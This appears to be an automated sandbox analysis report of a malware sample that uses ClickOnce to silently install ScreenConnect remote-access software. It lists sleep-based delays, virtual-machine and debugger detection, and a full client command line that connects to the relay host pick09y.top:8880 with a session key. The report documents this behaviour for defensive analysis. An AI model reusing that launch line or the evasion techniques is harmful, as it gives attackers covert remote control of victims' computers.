                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe TID: 7444Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -599652s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -599516s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -599394s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -598625s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -598293s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -598172s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -598061s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597939s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597800s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597421s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597311s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597202s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -597094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596546s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596327s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596210s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -596109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595917s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595806s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595666s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595327s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -595000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594891s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594641s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594421s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -594094s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593641s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593516s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593361s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593182s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -593069s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -592928s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -592797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -592687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7556Thread sleep time: -592577s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7764Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe TID: 2656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe TID: 1636Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C4A4B FindFirstFileExA,0_2_009C4A4B
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599652Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599394Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598293Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598061Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597939Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597800Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2245876378.0000016768828000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2244765941.00000167686C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2595636631.000002EA7902B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2596981400.000002EA7E641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2597052281.000002EA7E654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594952683.000002001D0D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: dfsvc.exe, 00000001.00000002.2242687962.0000016766749000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.2594330340.0000000000F0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: svchost.exe, 00000008.00000002.2594566603.000002001D03D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 00000008.00000002.2595477031.000002001DE5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Code function: 0_2_009C191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009C191F
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Code function: 0_2_009C1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009C1000
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Code function: 0_2_009C3677 mov eax, dword ptr fs:[00000030h] 0_2_009C3677
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Code function: 0_2_009C6893 GetProcessHeap,0_2_009C6893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Code function: 0_2_009C1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009C1493
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Code function: 0_2_009C4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009C4573
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Code function: 0_2_009C1AAC SetUnhandledExceptionFilter,0_2_009C1AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs | Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 756
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\b13jja8p.y3t\kxvnz36z.l04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\b13jja8p.y3t\kxvnz36z.l04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\b13jja8p.y3t\kxvnz36z.l04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr | Binary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr | Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe | Code function: 0_2_009C1BD4 cpuid 0_2_009C1BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Client.dll VolumeInformation
